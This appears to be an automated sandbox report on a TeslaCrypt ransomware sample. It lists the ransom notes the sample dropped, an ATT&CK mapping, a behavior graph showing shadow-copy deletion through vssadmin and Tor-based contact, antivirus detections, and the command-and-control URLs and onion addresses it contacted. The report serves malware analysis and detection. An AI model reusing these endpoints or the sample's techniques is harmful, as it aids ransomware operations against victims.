Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Code Cache\wasm\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\CertificateTransparency\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\pnacl\0.57.44.2492\_metadata\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\OriginTrials\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Local Storage\leveldb\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\MEIPreload\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crowd Deny\2022.10.19.1145\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Default\Storage\restore_files_gpmus.htmlJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\SSLErrorAssistant\7\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeFile opened: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\Crashpad\restore_files_gpmus.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\svcmtr.exeDirectory queried: number of queries: 1023

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts4
Native API		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		1
OS Credential Dumping		1
System Time Discovery		Remote Services1
Archive Collected Data		5
Ingress Tool Transfer		Exfiltration Over Other Network Medium5
Data Encrypted for Impact
CredentialsDomainsDefault Accounts3
Command and Scripting Interpreter		1
Browser Extensions		1
Access Token Manipulation		3
Obfuscated Files or Information		LSASS Memory1
System Network Connections Discovery		Remote Desktop Protocol11
Browser Session Hijacking		11
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt11
Registry Run Keys / Startup Folder		11
Process Injection		1
Install Root Certificate		Security Account Manager14
File and Directory Discovery		SMB/Windows Admin Shares1
Data from Local System		1
Multi-hop Proxy		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook11
Registry Run Keys / Startup Folder		12
Software Packing		NTDS24
System Information Discovery		Distributed Component Object Model1
Email Collection		3
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets1
Query Registry		SSHKeylogging4
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
File Deletion		Cached Domain Credentials13
Security Software Discovery		VNCGUI Input Capture2
Proxy		Data Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
Masquerading		DCSync1
Virtualization/Sandbox Evasion		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Modify Registry		Proc Filesystem2
Process Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
Virtualization/Sandbox Evasion		/etc/passwd and /etc/shadow1
Application Window Discovery		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
Access Token Manipulation		Network Sniffing1
Remote System Discovery		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd11
Process Injection		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task2
Hidden Files and Directories		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1586217 Sample: 0t8amSU3vd Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 54 Suricata IDS alerts for network traffic 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Antivirus detection for URL or domain 2->58 60 12 other signatures 2->60 7 0t8amSU3vd.exe 2 2->7         started        11 svcmtr.exe 2->11         started        13 svcmtr.exe 2->13         started        15 3 other processes 2->15 process3 dnsIp4 38 C:\Users\user\AppData\Roaming\svcmtr.exe, PE32 7->38 dropped 72 Detected unpacking (overwrites its own PE header) 7->72 74 Contains functionality to determine the online IP of the system 7->74 76 May drop file containing decryption instructions (likely related to ransomware) 7->76 78 Deletes itself after installation 7->78 18 svcmtr.exe 5 1002 7->18         started        23 cmd.exe 7->23         started        80 Found potential ransomware demand text 11->80 82 Found Tor onion address 11->82 84 Deletes shadow drive data (may be related to ransomware) 11->84 86 Hides that the sample has been downloaded from the Internet (zone.identifier) 13->86 48 192.168.2.13 unknown unknown 15->48 50 192.168.2.14 unknown unknown 15->50 52 3 other IPs or domains 15->52 25 chrome.exe 15->25         started        file5 signatures6 process7 dnsIp8 40 zpr5huq4bgmutfnf.tor2web.org 18->40 42 zpr5huq4bgmutfnf.onion.to 18->42 46 13 other IPs or domains 18->46 30 C:\Users\user\...\restore_files_gpmus.txt, ASCII 18->30 dropped 32 C:\Users\user\...\restore_files_gpmus.html, HTML 18->32 dropped 34 C:\Users\user\AppData\Local\...\Bears.jpg, data 18->34 dropped 36 221 other malicious files 18->36 dropped 62 Multi AV Scanner detection for dropped file 18->62 64 Detected unpacking (overwrites its own PE header) 18->64 66 May disable shadow drive data (uses vssadmin) 18->66 70 17 other signatures 18->70 27 vssadmin.exe 18->27         started        44 www.google.com 172.217.168.68, 443, 49176, 49178 GOOGLEUS United States 25->44 file9 68 Uses TOR for connection hidding 42->68 signatures10 process11 signatures12 88 Deletes shadow drive data (may be related to ransomware) 27->88

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
0t8amSU3vd.exe91%ReversingLabsWin32.Ransomware.TeslaCrypt
0t8amSU3vd.exe100%AviraTR/Crypt.ZPACK.123672
0t8amSU3vd.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\svcmtr.exe91%ReversingLabsWin32.Ransomware.TeslaCrypt

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496100%Avira URL Cloudmalware
Http://shmetterheath.ru/0%Avira URL Cloudsafe
http://wildsau.idv.uni-linz.ac.at/mfx/upx.html0%Avira URL Cloudsafe
http://ezglobalmarketing.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C9188100%Avira URL Cloudmalware
https://preprod-hangouts-googleapis.sandbox.google.com0%Avira URL Cloudsafe
http://aep554w4fm8j.fflroe598qu.com/%S0%Avira URL Cloudsafe
https://crash.corp.google.com/samples?reportid=&q=0%Avira URL Cloudsafe
https://zpr5huq4bgmutfnf.onion.to/0%Avira URL Cloudsafe
https://zpr5huq4bgmutfnf.tor2web.org/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD100%Avira URL Cloudmalware
http://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975100%Avira URL Cloudmalware
http://www.xfree86.org/)0%Avira URL Cloudsafe
http://www.teenpornotube.org/wp-content/themes/r.phpp0%Avira URL Cloudsafe
https://www.serenitynowbooksandgifts.com/100%Avira URL Cloudmalware
http://www.ecma-international.org/memento/codeofconduct.htm0%Avira URL Cloudsafe
http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34B0%Avira URL Cloudsafe
http://www.teenpornotube.org/wp-content/themes/r.phpa0%Avira URL Cloudsafe
http://fgainterests.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38914A0712A28548CB1A591D5BE2241C135B0E2F3FAB94EEE9E31C6BB0B8D33BD387F667397135C5EC483A155C0151211280780DA7581A2066232DDC3477639D3CA098F5C31FAE7319AB4DAE6A2EF1B042033039ED5685D79F8FCC098B742D884D5394719058E0C8D500DE20140A325CF0B0%Avira URL Cloudsafe
https://zpr5huq4bgmutfnf.onion.to/Bm0%Avira URL Cloudsafe
http://aoei243548ld.keedo93i1lo.com/%S0%Avira URL Cloudsafe
https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975=100%Avira URL Cloudmalware
http://shmetterheath.ru/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C9188464960%Avira URL Cloudsafe
http://aoei243548ld.keedo93i1lo.com/E722D94C1CAC34B0%Avira URL Cloudsafe
http://upx.sourceforge.net/upx-license.html.0%Avira URL Cloudsafe
http://www.linuxnet.com0%Avira URL Cloudsafe
file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/restore_files_gpmus.html0%Avira URL Cloudsafe
https://zpr5huq4bgmutfnf.onion.to/E722D94C1CAC34B0%Avira URL Cloudsafe
http://www.teenpornotube.org/wp-content/themes/r.php0%Avira URL Cloudsafe
http://relaxngcc.sf.net/).0%Avira URL Cloudsafe
http://oss.oracle.com/projects/webkit-java-mods/0%Avira URL Cloudsafe
http://www.nexus.hu/upx0%Avira URL Cloudsafe
http://tartarus.org/~martin/PorterStemmer0%Avira URL Cloudsafe
http://www.sgi.com/software/opensource/glx/license.html.0%Avira URL Cloudsafe
https://www-googleapis-staging.sandbox.google.com0%Avira URL Cloudsafe
https://zpr5huq4bgmutfnf.onion.to0%Avira URL Cloudsafe
http://www.sgi.com/software/opensource/cid/license.html0%Avira URL Cloudsafe
https://zpr5huq4bgmutfnf.onion.to/%S0%Avira URL Cloudsafe
http://oss.oracle.com/projects/gstreamer-mods/0%Avira URL Cloudsafe
http://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A100%Avira URL Cloudmalware
https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD100%Avira URL Cloudmalware
https://serenitynowbooksandgifts.com/100%Avira URL Cloudmalware
https://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975100%Avira URL Cloudmalware
https://zpr5huq4bgmutfnf.tor2web.org100%Avira URL Cloudmalware
http://fgainterests.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C9188464960%Avira URL Cloudsafe
http://www.ecma-international.org0%Avira URL Cloudsafe
http://errors.angularjs.org/1.6.4-local0%Avira URL Cloudsafe
https://zpr5huq4bgmutfnf.onion.to/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD9770%Avira URL Cloudsafe
http://teenpornotube.org/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25BD8C4E17EF6836F23642C06A5FF3A1CF2AEF4E14148B78507418AA0EAAE50DDC4F9D295FF1EF6F8F8C295F4189207899230F547B821D613C1DC3B1A4196340280%Avira URL Cloudsafe
http://ledshoppen.nl/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD90%Avira URL Cloudsafe
http://teenpornotube.org/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846490%Avira URL Cloudsafe
http://upx.tsx.org0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
teenpornotube.org
67.22.44.2
truetrue
    		unknown
    ipinfo.io
    		34.117.59.81
    		truefalse
      		high
      www.google.com
      		172.217.168.68
      		truefalse
        		high
        fgainterests.com
        		199.116.254.169
        		truetrue
          		unknown
          td-ccm-neg-87-45.wixdns.net
          		34.149.87.45
          		truefalse
            		high
            serenitynowbooksandgifts.com
            		185.230.63.171
            		truetrue
              		unknown
              zpr5huq4bgmutfnf.tor2web.org
              		103.198.0.111
              		truetrue
                		unknown
                www.teenpornotube.org
                		unknown
                		unknowntrue
                  		unknown
                  ezglobalmarketing.com
                  		unknown
                  		unknowntrue
                    		unknown
                    shmetterheath.ru
                    		unknown
                    		unknowntrue
                      		unknown
                      www.serenitynowbooksandgifts.com
                      		unknown
                      		unknowntrue
                        		unknown
                        ledshoppen.nl
                        		unknown
                        		unknowntrue
                          		unknown
                          zpr5huq4bgmutfnf.onion.to
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975true
                            • Avira URL Cloud: malware
                            		unknown
                            http://fgainterests.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38914A0712A28548CB1A591D5BE2241C135B0E2F3FAB94EEE9E31C6BB0B8D33BD387F667397135C5EC483A155C0151211280780DA7581A2066232DDC3477639D3CA098F5C31FAE7319AB4DAE6A2EF1B042033039ED5685D79F8FCC098B742D884D5394719058E0C8D500DE20140A325CF0Btrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://www.serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975=true
                            • Avira URL Cloud: malware
                            		unknown
                            file:///C:/Users/user/AppData/Roaming/Microsoft/Windows/Start%20Menu/Programs/Startup/restore_files_gpmus.htmlfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975true
                            • Avira URL Cloud: malware
                            		unknown
                            http://teenpornotube.org/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25BD8C4E17EF6836F23642C06A5FF3A1CF2AEF4E14148B78507418AA0EAAE50DDC4F9D295FF1EF6F8F8C295F4189207899230F547B821D613C1DC3B1A419634028true
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://apis.google.com/js/client.jssvcmtr.exe, 00000002.00000003.422925708.00000000039A1000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://crash.corp.google.com/samples?reportid=&q=svcmtr.exe, 00000002.00000003.454213714.0000000003751000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://ezglobalmarketing.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C9188svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmptrue
                                • Avira URL Cloud: malware
                                		unknown
                                http://www.diginotar.nl/cps/pkioverheid0svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensions-01svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://aep554w4fm8j.fflroe598qu.com/%Ssvcmtr.exe, 0000000D.00000002.406449433.0000000000431000.00000002.00000001.01000000.00000005.sdmptrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://preprod-hangouts-googleapis.sandbox.google.comsvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    Http://shmetterheath.ru/svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496svcmtr.exe, 00000002.00000003.526806159.00000000006ED000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://zpr5huq4bgmutfnf.tor2web.org/inst.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CDsvcmtr.exe, 00000002.00000003.757693083.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.744684272.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.746044261.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.754261964.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.527014764.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.659748540.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.422925708.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516382548.00000000039E6000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmptrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    https://hangouts.google.com/hangouts/_/logprefsvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://search.msn.com/docs/siteowner.aspx.svcmtr.exe, 00000002.00000003.753072751.0000000003733000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://creativecommons.org/publicdomain/zero/1.0/.svcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/accounts/OAuthLogin?issueuberauth=1svcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://github.com/madler/zlib/blob/master/zlib.hsvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://wildsau.idv.uni-linz.ac.at/mfx/upx.htmlsvcmtr.exe, 00000002.00000003.753219048.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://www.google.com/tools/feedbacksvcmtr.exe, 00000002.00000003.415718725.000000000371C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://github.com/google/closure-library/wiki/goog.module:-an-ES6-module-like-alternative-to-goog.psvcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.407092366.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://zpr5huq4bgmutfnf.onion.to/svcmtr.exe, 00000002.00000002.876613547.00000000036F0000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://developer.mozilla.org/en-US/Add-ons/SDK/Tutorials/Creating_event_targetssvcmtr.exe, 00000002.00000003.526806159.00000000006D0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.teenpornotube.org/wp-content/themes/r.phppsvcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.ietf.org/id/draft-holmer-rmcat-transport-wide-cc-extensionssvcmtr.exe, 00000002.00000003.454330167.0000000002980000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://payments.google.com/payments/v4/js/integrator.jssvcmtr.exe, 00000002.00000003.407162065.00000000036F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://aep554w4fm8j.fflroe598qu.com/E722D94C1CAC34Brestore_files_gpmus.txt287.2.drtrue
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.teenpornotube.org/wp-content/themes/r.phpasvcmtr.exe, 00000002.00000003.754010566.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.740190996.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.526806159.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000003.516398200.000000000072B000.00000004.00000020.00020000.00000000.sdmp, svcmtr.exe, 00000002.00000002.875689270.000000000072B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
